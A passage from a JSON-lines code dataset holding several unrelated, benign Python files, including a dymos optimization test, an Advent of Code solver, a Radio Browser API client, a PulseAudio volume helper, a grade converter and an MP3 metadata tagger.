p.driver.opt_settings['print_level'] = 0\n p.driver.opt_settings['nlp_scaling_method'] = 'gradient-based'\n p.driver.opt_settings['alpha_for_y'] = 'safer-min-dual-infeas'\n p.driver.opt_settings['mu_strategy'] = 'monotone'\n p.driver.opt_settings['bound_mult_init_method'] = 'mu-based'\n p.driver.options['print_results'] = False\n\n # declare total derivative coloring to accelerate the UDE linear solves\n p.driver.declare_coloring()\n\n p.setup(check=False)\n\n # --- set initial guess ---\n # The initial condition of cart-pole (i.e., state values at time 0) is set here\n # because we set `fix_initial=True` when declaring the states.\n p.set_val(\"traj.phase.t_initial\", 0.0) # set initial time to 0.\n p.set_val(\"traj.phase.states:x\", phase.interp(xs=[0, 1, 2], ys=[0, 1, 1], nodes=\"state_input\"), units=\"m\")\n p.set_val(\"traj.phase.states:x_dot\", phase.interp(xs=[0, 1, 2], ys=[0, 0.1, 0], nodes=\"state_input\"), units=\"m/s\")\n p.set_val(\"traj.phase.states:theta\", phase.interp(xs=[0, 1, 2], ys=[0, np.pi/2, np.pi], nodes=\"state_input\"), units=\"rad\")\n p.set_val(\"traj.phase.states:theta_dot\", phase.interp(xs=[0, 1, 2], ys=[0, 1, 0], nodes=\"state_input\"), units=\"rad/s\")\n p.set_val(\"traj.phase.states:energy\", phase.interp(xs=[0, 1, 2], ys=[0, 30, 60], nodes=\"state_input\"))\n p.set_val(\"traj.phase.controls:f\", phase.interp(xs=[0, 1, 2], ys=[3, -1, 0], nodes=\"control_input\"), units=\"N\")\n\n # --- run optimization ---\n dm.run_problem(p, run_driver=True, simulate=False, simulate_kwargs={\"method\": \"Radau\", \"times_per_seg\": 10})\n\n # --- check outputs ---\n # objective value\n obj = p.get_val(\"traj.phase.states:energy\", units=\"N**2*s\")[-1]\n assert_near_equal(obj, 58.8839489745, tolerance=1e-3)\n\n\nif __name__ == \"__main__\":\n 
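# run this optimization test when the module is executed directly
 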
unittest.main()\n","repo_name":"OpenMDAO/dymos","sub_path":"dymos/examples/cart_pole/test/test_cartpole_opt.py","file_name":"test_cartpole_opt.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"53"} +{"seq_id":"1591784677","text":"# AOC 2015 - Day 15\n\nimport time\n\nIN_FILE = \"AOC2015\\\\201515.txt\"\n# IN_FILE = \"AOC2015\\\\201515.sample.txt\"\n\ndef parse():\n with open(IN_FILE) as f:\n out = [line for line in f.read().split('\\n')]\n\n # Sprinkles: capacity 5, durability -1, flavor 0, texture 0, calories 5\n ingredients = []\n for x in out:\n ingr, a = x.split(':')\n _,cap,_,dur,_,fla,_,tex,_,cal = a.strip().split(' ')\n ingredients.append(list([ingr,int(cap.strip(',')),int(dur.strip(',')),int(fla.strip(',')),int(tex.strip(',')),int(cal)]))\n\n return ingredients\n\n\ndef part(ingredients): # -> part1: 13882464, part2: 11171160\n imax = 0\n imax500 = 0\n\n for a in range(1,100):\n for b in range(1,100):\n for c in range(1,100):\n for d in range(1,100):\n if a + b + c + d == 100:\n cap = (a * ingredients[0][1]) + (b * ingredients[1][1]) + (c * ingredients[2][1]) + (d * ingredients[3][1])\n dur = (a * ingredients[0][2]) + (b * ingredients[1][2]) + (c * ingredients[2][2]) + (d * ingredients[3][2])\n fla = (a * ingredients[0][3]) + (b * ingredients[1][3]) + (c * ingredients[2][3]) + (d * ingredients[3][3])\n tex = (a * ingredients[0][4]) + (b * ingredients[1][4]) + (c * ingredients[2][4]) + (d * ingredients[3][4])\n cal = (a * ingredients[0][5]) + (b * ingredients[1][5]) + (c * ingredients[2][5]) + (d * ingredients[3][5])\n if cap < 0: cap = 0\n if dur < 0: dur = 0\n if fla < 0: fla = 0\n if tex < 0: tex = 0\n total = cap * dur * fla * tex\n imax = max([imax,total])\n if cal == 500:\n imax500 = max([imax500,total])\n \n return imax,imax500\n\n\nif __name__ == \"__main__\":\n timestart = time.time()\n \n puzzle_input = parse()\n p1,p2 = part(puzzle_input)\n\n print(\"part 1:\",p1)\n print(\"part 2:\",p2)\n \n timeend = time.time()\n print(\"Execution time: \", \"{:.7f}\".format(round(timeend-timestart,7)))\n\n","repo_name":"n7tms/AOC","sub_path":"AOC2015/201515.py","file_name":"201515.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33016369948","text":"# -*- coding: utf-8 -*-\n# @Time : 2021-04-27 10:51\n# @Author : baoguo\n# @File : Day16-异步爬虫.py\n# @Software : PyCharm\nfrom multiprocessing.dummy import Pool\nimport time\n\nstart_time = time.time()\n\n\ndef get_page(name):\n print(\"downloading: \", name)\n time.sleep(2)\n print(\"download finished \", name)\n\n\nname_list = [\"zbg\", 'xg', 'dc', 'zh']\n\n# instantiate the thread pool object\npool = Pool(4)\n# pass each element of the list to get_page for processing\npool.map(get_page, name_list)\n\n# for i in range(len(name_list)):\n# get_page(name_list[i])\n\nend_time = time.time()\n\nprint('%d seconds' % (end_time - start_time))\n\n","repo_name":"S180231891/PaChong","sub_path":"Day16-异步爬虫.py","file_name":"Day16-异步爬虫.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73569319527","text":"#!/usr/bin/env python\nfrom math import floor, log10\n\n\n_units2_table = [\n \"\", \"C\", \"F\", \"K\", \"V\", \"A\", \"W\", \"J\", \"Coulombs\", \"VA\",\n \"Nits\", \"lumen\", \"lux\", \"Candela\", \"kPa\", \"PSI\", \"N\", \"CFM\", \"RPM\", \"Hz\",\n \"microsecond\", \"millisecond\", \"sec\", \"min\", \"hour\", \"day\", \"week\", 
\"mil\",\n \"inch\", \"ft\", \"cu in\", \"cu feet\", \"mm\", \"cm\", \"m\", \"cu cm\", \"cu m\", \"l\",\n \"fluid ounce\", \"radians\", \"steradians\", \"rev\", \"hz\", \"gravities\", \"ounce\",\n \"pound\", \"ft-lb\", \"oz-in\", \"gauss\", \"gilberts\", \"henry\", \"millihenry\",\n \"farad\", \"microfarad\", \"ohms\", \"siemens\", \"mole\", \"becquerel\",\n \"PPM (parts/million)\", \"reserved\", \"Decibels\", \"DbA\", \"DbC\", \"gray\",\n \"sievert\", \"color K\", \"bit\", \"Kb\", \"Mb\", \"Gb\", \"B\", \"KB\", \"MB\", \"gigabyte\",\n \"word\", \"dword\", \"qword\", \"line\", \"hit\", \"miss\", \"retry\", \"reset\",\n \"overrun / overflow\", \"underrun\", \"collision\", \"packets\", \"msgs\",\n \"characters\", \"error\", \"correctable error\", \"uncorrectable error\",\n \"fatal error\", \"grams\"\n]\n\n_units1_rate_table = [\"\", \"uS\", \"mS\", \"s\", \"min\", \"hr\", \"day\", \"\"]\n_units1_mod_table = [\"\", \"/\", \"*\", \"\"]\n\nhs_states2string = {\n 0x80: \"Con lost\",\n 0x40: \"Deactivating\",\n 0x20: \"Deact Req\",\n 0x10: \"Active\",\n 0x08: \"Activating\",\n 0x04: \"Act Req\",\n 0x02: \"Inactive\",\n 0x01: \"N/A\"\n}\n\nthreshold_offsets_msg = [\n \"Lower Non-critical - going low\",\n \"Lower Non-critical - going high\",\n \"Lower Critical - going low\",\n \"Lower Critical - going high\",\n \"Lower Non-recoverable - going low\",\n \"Lower Non-recoverable - going high\",\n \"Upper Non-critical - going low\",\n \"Upper Non-critical - going high\",\n \"Upper Critical - going low\",\n \"Upper Critical - going high\",\n \"Upper Non-recoverable - going low\",\n \"Upper Non-recoverable - going high\",\n \"Unknown\",\n \"Unknown\",\n \"Unknown\",\n \"Unknown\",\n]\n\n\ndef get_sdr_egu(entry):\n unit1 = entry.units_1\n unit2 = entry.units_2\n rate_part = (unit1 >> 3) & 0x7\n mod_part = (unit1 >> 1) & 0x3\n percentage = '% ' if unit1 & 0x1 else ''\n base_unit = _units2_table[unit2]\n mod_unit = _units1_mod_table[mod_part]\n rate_unit = _units1_rate_table[rate_part]\n return (percentage + base_unit\n + ((mod_unit + rate_unit) if rate_unit else \"\")).strip()\n\n\ndef get_sdr_prec(entry):\n delta = entry.convert_sensor_raw_to_value(0) - \\\n entry.convert_sensor_raw_to_value(1)\n offset = entry.convert_sensor_raw_to_value(0)\n delta_frac = delta % 1\n offset_frac = offset % 1\n prec = 0\n if delta_frac != 0.0:\n prec = int(max(prec, -floor(log10(abs(delta_frac)))))\n\n if offset_frac != 0.0:\n prec = int(max(prec, -floor(log10(abs(offset_frac)))))\n\n return prec","repo_name":"EmilioPeJu/epicsmonmtca","sub_path":"epicsmonmtca/ipmiutils.py","file_name":"ipmiutils.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3188824229","text":"import numpy as np\nimport pandas as pd\nfrom utils import RandomVectors, OneHotVectors\nfrom grave import FactorizationMachine\nfrom sklearn.linear_model import LinearRegression\nfrom glove import Glove\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import cross_validate\n\n\"\"\"\nBOREP: Bag of Random Embedding Projections\n\nInstead of pooling the atom vectors themselves, we'll initialize a projection matrix to compute the compound embedding:\n\nh = f(W*e)\n\nwhere h is the compound embedding, f is a pooling function, W is the projection matrix, and e is the atom vector.\n\nSee: Wieting, J., & Kiela, D. (2019). 
No training required: Exploring random encoders for sentence classification. \n arXiv preprint arXiv:1901.10444.\n\"\"\"\n\nif __name__ == '__main__':\n\n # model = FactorizationMachine.load_model(\"../out/all_stable_bandgap_dim20.fm.ctx10_add_cont.model\")\n # embeddings = model.W\n # converter = lambda x: x\n # dim = 20\n\n # model = RandomVectors.load(\"../out/all_stable_bandgap_dim20.random.model\")\n # embeddings = model.vectors\n # converter = lambda x: x\n # dim = 20\n\n # model = Glove.load(\"../out/all_stable_bandgap_dim20.glove.model\")\n # embeddings = model.word_vectors\n # converter = lambda x: x.lower()\n # dim = 20\n\n model = OneHotVectors.load(\"../out/all_stable_bandgap_dim20.one_hot.model\")\n embeddings = model.vectors\n converter = lambda x: x\n dim = 89\n\n df = pd.read_pickle(\"../out/all_stable_bandgap.pkl\")\n\n # regression, args = LinearRegression, {}\n regression, args = RandomForestRegressor, {\"n_estimators\": 100, \"n_jobs\": 4}\n # regression, args = MLPRegressor, {\"hidden_layer_sizes\": (100,), \"max_iter\": 500}\n\n # pool = np.mean\n pool = np.max\n\n exclude_zero = False\n # exclude_zero = True\n\n borep_dim = 200\n\n W = np.random.uniform(low=-1/np.sqrt(dim), high=1/np.sqrt(dim), size=(borep_dim, dim))\n\n X = []\n y = []\n for i in range(len(df['structure'])):\n struct = df['structure'][i]\n band_gap = df['band_gap'][i]\n\n if band_gap == 0.0 and exclude_zero:\n continue\n\n vectors = []\n for element in struct.species:\n atom_vector = np.array(embeddings[model.dictionary[converter(element.name)]])\n vectors.append(np.dot(W, atom_vector))\n X.append(pool(vectors, axis=0))\n y.append(band_gap)\n\n cv_results = cross_validate(regression(**args), X, y, cv=10, return_estimator=True,\n scoring=('r2', 'neg_root_mean_squared_error'))\n # the r2 score is the coefficient of determination, R^2, of the prediction\n print(cv_results['test_r2'])\n print(cv_results['test_neg_root_mean_squared_error'])\n\n print(\"mean fold r2 score: %s\" % np.mean(cv_results['test_r2']))\n print(\"std fold r2 score: %s\" % np.std(cv_results['test_r2']))\n print(\"mean fold neg_root_mean_squared_error score: %s\" % np.mean(cv_results['test_neg_root_mean_squared_error']))\n print(\"std fold neg_root_mean_squared_error score: %s\" % np.std(cv_results['test_neg_root_mean_squared_error']))\n","repo_name":"lantunes/materials-sandbox","sub_path":"scripts/regression_borep.py","file_name":"regression_borep.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"803810943","text":"import requests\n\nfrom pyradios.base_url import pick_base_url\nfrom pyradios.utils import type_check\n\n\nclass Request:\n def __init__(self, fmt, session=None, **kwargs):\n self._session = self._init_session(session)\n\n self._fmt = fmt\n\n if \"base_url\" in kwargs: # for tests with the responses lib\n self.base_url = kwargs.get(\"base_url\")\n else:\n self.base_url = pick_base_url()\n\n def _init_session(self, session):\n if session is None:\n return requests.Session()\n return session\n\n def get(self, endpoint, **kwargs):\n\n if \"fmt\" in kwargs:\n self._fmt = kwargs.get(\"fmt\")\n endpoint = self._fmt + \"/\" + endpoint.split(\"/\", 1)[1]\n del kwargs[\"fmt\"]\n\n content_type = \"application/{}\".format(self._fmt)\n\n headers = {\"content-type\": content_type, \"User-Agent\": \"pyradios/dev\"}\n\n url = self.base_url + 
{"seq_id":"803810943","text":"import requests\n\nfrom pyradios.base_url import pick_base_url\nfrom pyradios.utils import type_check\n\n\nclass Request:\n def __init__(self, fmt, session=None, **kwargs):\n self._session = self._init_session(session)\n\n self._fmt = fmt\n\n if \"base_url\" in kwargs: # for tests with the responses lib\n self.base_url = kwargs.get(\"base_url\")\n else:\n self.base_url = pick_base_url()\n\n def _init_session(self, session):\n if session is None:\n return requests.Session()\n return session\n\n def get(self, endpoint, **kwargs):\n\n if \"fmt\" in kwargs:\n self._fmt = kwargs.get(\"fmt\")\n endpoint = self._fmt + \"/\" + endpoint.split(\"/\", 1)[1]\n del kwargs[\"fmt\"]\n\n # both supported formats (json, xml) map to an application/<fmt> content type\n content_type = \"application/{}\".format(self._fmt)\n\n headers = {\"content-type\": content_type, \"User-Agent\": \"pyradios/dev\"}\n\n url = self.base_url + endpoint\n\n resp = self._session.get(url, headers=headers, params=kwargs)\n\n if resp.status_code == 200:\n if self._fmt == \"xml\":\n # return resp.text\n return resp.content\n return resp.json()\n\n return resp.raise_for_status()\n\n\nclass RadioBrowser:\n \"\"\"This class implements the main interface for the Radio Browser API.\n\n Args:\n session (obj, optional): The `requests_cache.CachedSession` instance.\n\n Examples:\n To create an instance of the RadioBrowser class with cached session\n\n >>> from pyradios import RadioBrowser\n >>> from requests_cache import CachedSession\n >>> import datetime\n >>> from datetime import timedelta\n >>> expire_after = timedelta(days=3)\n >>> session = CachedSession(\n ... cache_name='cache',\n ... backend='sqlite',\n ... expire_after=expire_after)\n >>> rb = RadioBrowser(session=session)\n >>> rb.countries()\n\n No cache\n\n >>> import pyradios\n >>> rb = pyradios.RadioBrowser()\n >>> rb.countries()\n\n Note:\n Run `pip install requests_cache` to use cached session.\n\n \"\"\"\n\n def __init__(self, fmt=\"json\", session=None, **kwargs):\n\n self._fmt = fmt\n self.client = Request(self._fmt, session, **kwargs)\n\n @type_check\n def countries(self, code=None):\n \"\"\"Lists all countries.\n\n Args:\n code (str, optional): Filter by country code. Defaults to None.\n\n Returns:\n list: Countries.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_countries\n \"\"\"\n\n if code:\n endpoint = \"{fmt}/countries/{code}\".format(\n fmt=self._fmt, code=code\n )\n else:\n endpoint = \"{fmt}/countries/\".format(fmt=self._fmt)\n return self.client.get(endpoint)\n\n @type_check\n def countrycodes(self, code=None):\n \"\"\"Lists all countries.\n\n Args:\n code (str, optional): Filter by country code. Defaults to None.\n\n Returns:\n list: Countries.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_countrycodes\n \"\"\"\n\n if code:\n endpoint = \"{fmt}/countrycodes/{code}\".format(\n fmt=self._fmt, code=code\n )\n else:\n endpoint = \"{fmt}/countrycodes/\".format(fmt=self._fmt)\n return self.client.get(endpoint)\n\n @type_check\n def codecs(self, codec=None):\n \"\"\"Lists all codecs.\n\n Args:\n codec (str, optional): Filter by codec. Defaults to None.\n\n Returns:\n list: Codecs.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_codecs\n \"\"\"\n\n endpoint = \"{fmt}/codecs/\".format(fmt=self._fmt)\n\n if codec:\n response = self.client.get(endpoint)\n return list(\n filter(\n lambda _codecs: _codecs[\"name\"].lower() == codec.lower(),\n response,\n )\n )\n\n return self.client.get(endpoint)\n\n @type_check\n def states(self, country=None, state=None):\n \"\"\"Lists all states.\n\n Args:\n country (str, optional): Filter by country. Defaults to None.\n state (str, optional): Filter by state. 
Defaults to None.\n\n Returns:\n list: States.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_states\n \"\"\"\n\n endpoint = \"{fmt}/states\".format(fmt=self._fmt)\n\n if country and state:\n\n response = self.client.get(endpoint)\n return list(\n filter(\n lambda _state: _state[\"country\"].lower() == country.lower()\n and _state[\"name\"].lower() == state.lower(),\n response,\n )\n )\n\n if country:\n response = self.client.get(endpoint)\n return list(\n filter(\n lambda _state: _state[\"country\"].lower()\n == country.lower(),\n response,\n )\n )\n if state:\n response = self.client.get(endpoint)\n return list(\n filter(\n lambda _state: _state[\"name\"].lower() == state.lower(),\n response,\n )\n )\n return self.client.get(endpoint)\n\n @type_check\n def languages(self, language=None):\n \"\"\"Lists all languages.\n\n Args:\n language (str, optional): Filter by language. Defaults to None.\n\n Returns:\n list: Languages.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_languages\n \"\"\"\n if language:\n endpoint = \"{fmt}/languages/{language}\".format(\n fmt=self._fmt, language=language\n )\n else:\n endpoint = \"{fmt}/languages/\".format(fmt=self._fmt)\n\n return self.client.get(endpoint)\n\n @type_check\n def tags(self, tag=None):\n \"\"\"Lists all tags.\n\n Args:\n tag (str, optional): Filter by tag. Defaults to None.\n\n Returns:\n list: Tags.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_tags\n \"\"\"\n\n if tag:\n endpoint = \"{fmt}/tags/{tag}\".format(fmt=self._fmt, tag=tag)\n else:\n endpoint = \"{fmt}/tags/\".format(fmt=self._fmt)\n\n return self.client.get(endpoint)\n\n def station_by_uuid(self, stationuuid):\n \"\"\"Radio station by stationuuid.\n\n Args:\n stationuuid (str): A globally unique identifier for the station.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n endpoint = \"{fmt}/stations/byuuid/{uuid}\".format(\n fmt=self._fmt, uuid=stationuuid\n )\n return self.client.get(endpoint)\n\n def stations_by_name(self, name, exact=False, **kwargs):\n \"\"\"Lists all radio stations by name.\n\n Args:\n name (str): The name of the station.\n exact (bool, optional): Only exact matches, otherwise all\n matches (default: False).\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"name\": name, \"name_exact\": exact})\n return self.search(**kwargs)\n\n def stations_by_codec(self, codec, exact=False, **kwargs):\n \"\"\"Lists all radio stations by codec.\n\n Args:\n codec (str): The name of the codec.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"codec\": codec, \"codec_exact\": exact})\n return self.search(**kwargs)\n\n def stations_by_country(self, country, exact=False, **kwargs):\n \"\"\"Lists all radio stations by country.\n\n Args:\n country (str): The name of the country.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"country\": country, \"country_exact\": exact})\n return self.search(**kwargs)\n\n def stations_by_countrycode(self, code, **kwargs):\n \"\"\"Lists all radio stations by country code.\n\n Args:\n code (str): Official countrycodes as in ISO 3166-1 alpha-2.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"countrycode\": code})\n 
return self.search(**kwargs)\n\n def stations_by_state(self, state, exact=False, **kwargs):\n \"\"\"Lists all radio stations by state.\n\n Args:\n state (str): The name of the state.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"state\": state, \"state_exact\": exact})\n return self.search(**kwargs)\n\n def stations_by_language(self, language, exact=False, **kwargs):\n \"\"\"Lists all radio stations by language.\n\n Args:\n language (str): The name of the language.\n\n Returns:\n list: Stations.\n\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"language\": language, \"language_exact\": exact})\n return self.search(**kwargs)\n\n def stations_by_tag(self, tag, exact=False, **kwargs):\n \"\"\"Lists all radio stations by tag.\n\n Args:\n tag (str): The name of the tag.\n\n Returns:\n list: Stations.\n See details:\n https://de1.api.radio-browser.info/#List_of_radio_stations\n \"\"\"\n kwargs.update({\"tag\": tag, \"tag_exact\": exact})\n return self.search(**kwargs)\n\n def click_counter(self, stationuuid):\n \"\"\"Increase the click count of a station by one.\n\n This should be called every time a user starts\n playing a stream to mark the stream more popular than others.\n Every call to this endpoint from the same IP address and for\n the same station only gets counted once per day. The call will\n return detailed information about the stream, supported output\n formats: JSON\n\n Args:\n stationuuid (str): A globally unique identifier for the station.\n\n Returns:\n dict: A dict containing information about the radio station.\n\n See details:\n https://de1.api.radio-browser.info/#Count_station_click\n \"\"\"\n endpoint = \"{fmt}/url/{uuid}\".format(fmt=self._fmt, uuid=stationuuid)\n\n return self.client.get(endpoint)\n\n def stations(self, **kwargs):\n \"\"\"Lists all radio stations.\n\n Returns:\n list: Stations.\n\n See details:\n https://nl1.api.radio-browser.info/#List_of_all_radio_stations\n \"\"\"\n endpoint = \"{fmt}/stations\".format(fmt=self._fmt)\n return self.client.get(endpoint, **kwargs)\n\n @type_check\n def search(self, **kwargs):\n \"\"\"Advanced search.\n\n It will search for the station whose attribute\n contains the search term.\n\n Args:\n name (str, optional): Name of the station.\n name_exact (bool, optional): Only exact matches, otherwise all\n matches (default: False).\n country (str, optional): Country of the station.\n country_exact (bool, optional): Only exact matches, otherwise\n all matches (default: False).\n countrycode (str, optional): 2-digit countrycode of the station\n (see ISO 3166-1 alpha-2)\n state (str, optional): State of the station.\n state_exact (bool, optional): Only exact matches, otherwise all\n matches. (default: False)\n language (str, optional): Language of the station.\n language_exact (bool, optional): Only exact matches, otherwise\n all matches. (default: False)\n tag (str, optional): Tag of the station.\n tag_exact (bool, optional): Only exact matches, otherwise all\n matches. (default: False)\n tag_list (str, optional): A comma-separated list of tags.\n bitrate_min (int, optional): Minimum of kbps for bitrate field of\n stations in result. (default: 0)\n bitrate_max (int, optional): Maximum of kbps for bitrate field of\n stations in result. 
(default: 1000000)\n order (str, optional): The result list will be sorted by: name,\n url, homepage, favicon, tags, country, state, language, votes,\n codec, bitrate, lastcheckok, lastchecktime, clicktimestamp,\n clickcount, clicktrend, random\n reverse (bool, optional): Reverse the result list if set to true.\n (default: false)\n offset (int, optional): Starting value of the result list from\n the database. For example, if you want to do paging on the\n server side. (default: 0)\n limit (int, optional): Number of returned datarows (stations)\n starting with offset (default 100000)\n hidebroken (bool, optional): whether to hide broken stations from\n the list. Note: Not documented in the \"Advanced Station Search\".\n\n Returns:\n list: Stations.\n\n Example:\n >>> from pyradios import RadioBrowser\n >>> rb = RadioBrowser()\n >>> rb.search(name='BBC Radio 1', name_exact=True)\n\n See details:\n https://de1.api.radio-browser.info/#Advanced_station_search\n \"\"\"\n endpoint = \"{fmt}/stations/search\".format(fmt=self._fmt)\n return self.client.get(endpoint, **kwargs)\n\n","repo_name":"hxebolax/zRadio","sub_path":"addon/globalPlugins/zRadio/pyradios/radios.py","file_name":"radios.py","file_ext":"py","file_size_in_byte":14214,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
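For orientation, a short usage sketch of the RadioBrowser class above. It assumes network access to the public radio-browser.info API; the station name is just an example, and the dict keys are the fields the API returns for stations:

from pyradios import RadioBrowser

rb = RadioBrowser()
# Exact-name lookup; Request.get returns the JSON-decoded list of station dicts
stations = rb.stations_by_name("BBC Radio 1", exact=True)
for st in stations[:3]:
    print(st["name"], st["url"], st["countrycode"])
# Register a listen so the station's click count reflects real usage
if stations:
    rb.click_counter(stations[0]["stationuuid"])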
{"seq_id":"6883719455","text":"from __future__ import annotations\nfrom typing import Optional\n\nimport os\nimport re\nimport logging\n\nfrom .bar_display import BarDisplay\nfrom .execute import execute\n\nlogger = logging.getLogger(__name__)\n\n\nclass PaCtl:\n def __init__(self, sink: int=0, bar_display: Optional[BarDisplay]=None) -> None:\n self._sink = sink\n self._display = bar_display\n self._matcher = re.compile(r\".*?(\\d+)%.*\")\n\n def mute(self) -> None:\n os.system(\"pactl set-sink-mute %d toggle &\" % self._sink)\n if self._display is not None:\n self._display.display(0.)\n\n def volume_adj(self, perc: int) -> None:\n os.system(\"pactl set-sink-volume %d %+d%% &\" % (self._sink, perc))\n if self._display is not None:\n vol = execute(\"pactl list sinks | grep '^[[:space:]]Volume:' | head -n $(( %d + 1 )) | tail -n 1\" % self._sink)\n match = self._matcher.match(vol)\n if match is not None:\n self._display.display(float(match.group(1))/100.)\n\n\n","repo_name":"jbuchermn/newm","sub_path":"newm/helper/pactl.py","file_name":"pactl.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":921,"dataset":"github-code","pt":"53"} {"seq_id":"18299872219","text":"import sys\nimport json\nfrom types import SimpleNamespace\n# Given a student's score on a test, return a letter grade\n\ngradeNS = SimpleNamespace(\n\taHigh= 100,\n\taLow= 90,\n\tbHigh= 89,\n\tbLow= 80,\n\tcHigh= 79,\n\tcLow= 70,\n\tdHigh= 69,\n\tdLow= 60,\n\tfHigh= 59,\n\tfLow= 0\n)\n\ndef convertPercentToGrade(val, gradeNS):\n\tif gradeNS.fLow <= val <= gradeNS.fHigh:\n\t\treturn 'F'\n\telif gradeNS.dLow <= val <= gradeNS.dHigh:\n\t\treturn 'D'\n\telif gradeNS.cLow <= val <= gradeNS.cHigh:\n\t\treturn 'C'\n\telif gradeNS.bLow <= val <= gradeNS.bHigh:\n\t\treturn 'B'\n\telif gradeNS.aLow <= val <= gradeNS.aHigh:\n\t\treturn 'A'\n\telse:\n\t\treturn 'ERROR - Out of bounds'\n\ndef gradeToLetter(val, total, gradeNS):\n\tif val > 100 and (not bool(total)):\n\t\tprint(UserWarning('ERROR - Values over 100 need a \"total\" arg to divide by'))\n\telif not total:\n\t\tprint(f\"Grade: {convertPercentToGrade(val, gradeNS)}\")\n\telif total:\n\t\tprint(f\"Grade: {convertPercentToGrade(val / total * 100, gradeNS)} - {val / total * 100}\")\n\telse:\n\t\tprint('invalid value')\n\ndef handleInput():\n\t'''\n\tReads up to 3 values from argv or interactive prompts\n\t\tval: value as percentage correct\n\t\ttotal: changes functionality to # correct out of 'total'\n\t\tgradeNS: user provided JSON object to change the default scoring\n\t\t\t- keys must use double quotes\n\t\t\t- e.g. ... 10 10 '{\"aHigh\": 50, \"aLow\": 20, ... }'\n\t'''\n\ttry:\n\t\tuserBaseVal = int(sys.argv[1]) if len(sys.argv) > 1 else int(input(\"What's the grade / value? \"))\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn\n\n\ttry:\n\t\ttotalValInput = sys.argv[2] if len(sys.argv) > 2 else input(\"Opt: Total points? \")\n\t\tuserTotalVal = int(totalValInput) if bool(totalValInput) else False\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn\n\n\tuserGradeNS = sys.argv[3] if len(sys.argv) > 3 else input(\"Opt: Custom grading?\\n\")\n\tif len(userGradeNS):\n\t\ttry:\n\t\t\tparseGradeNS = json.loads(\n\t\t\t\tuserGradeNS,\n\t\t\t\tobject_hook=lambda d: SimpleNamespace(**d)\n\t\t\t)\n\t\texcept json.decoder.JSONDecodeError as e:\n\t\t\tprint(\"Does the provided object start with quotes? eg: '{...}' \")\n\t\t\tprint(f\"{type(e).__name__} at line {e.__traceback__.tb_lineno} of {__file__}: {e}\")\n\t\t\treturn\n\n\tgradeToLetter(\n\t\tuserBaseVal,\n\t\tuserTotalVal,\n\t\tparseGradeNS if bool(userGradeNS) else gradeNS\n\t)\n\nhandleInput()\n\n'''\npython grade-to-letter.py 10 100 '{\"aHigh\": 100,\"aLow\": 90,\"bHigh\": 89,\"bLow\": 80,\"cHigh\": 79,\"cLow\": 70,\"dHigh\": 69,\"dLow\": 60,\"fHigh\": 59,\"fLow\": 0}'\n'''","repo_name":"JoshMLeslie/learning-python","sub_path":"grade-to-letter.py","file_name":"grade-to-letter.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"18099515677","text":"from search import *\nimport os, sys\nfrom acrcloud.recognizer import ACRCloudRecognizer\nimport json\nimport eyed3\n\nif __name__ == '__main__':\n config = {\n 'host':'XXX',\n 'access_key':'XXX', \n 'access_secret':'XXX',\n 'timeout':10 # seconds\n }\n\n re = ACRCloudRecognizer(config)\n\n\n result= re.recognize_by_file(sys.argv[1], 0)\n audiof = eyed3.load(sys.argv[1])\n \n result1 = json.loads(result)\n\n status = result1['status']\t\n\n music = (result1['metadata'])['music']\n album = ((music[0])['album'])['name']\n title = (music[0])['title']\n artists = (((music[0])['artists'])[0])['name']\n \n get_image(title)\n try:\n \timage = open(title + \".jpg\", \"rb\").read()\n\n except IOError:\n \timage = open(title + \".png\", \"rb\").read()\n \n audiof.tag.images.set(3, image, \"image/jpeg\")\n audiof.tag.artist = artists\n audiof.tag.album = album\n audiof.tag.title = title\n audiof.tag.save()\n \n","repo_name":"akhilabrahamt/mp3-metadata-edit","sub_path":"medit.py","file_name":"medit.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"3591802304","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n#=============================================================================\n# FileName:\n# Desc:\n# Author: 白开水\n# Email: vekergu@163.com\n# HomePage: https://github.com/vekergu\n# Version: 0.0.1\n# LastChange: \n# History:\n#=============================================================================\nfrom __future__ import print_function\n'''\nProblem: timing functions, example 4 - a number-guessing game that 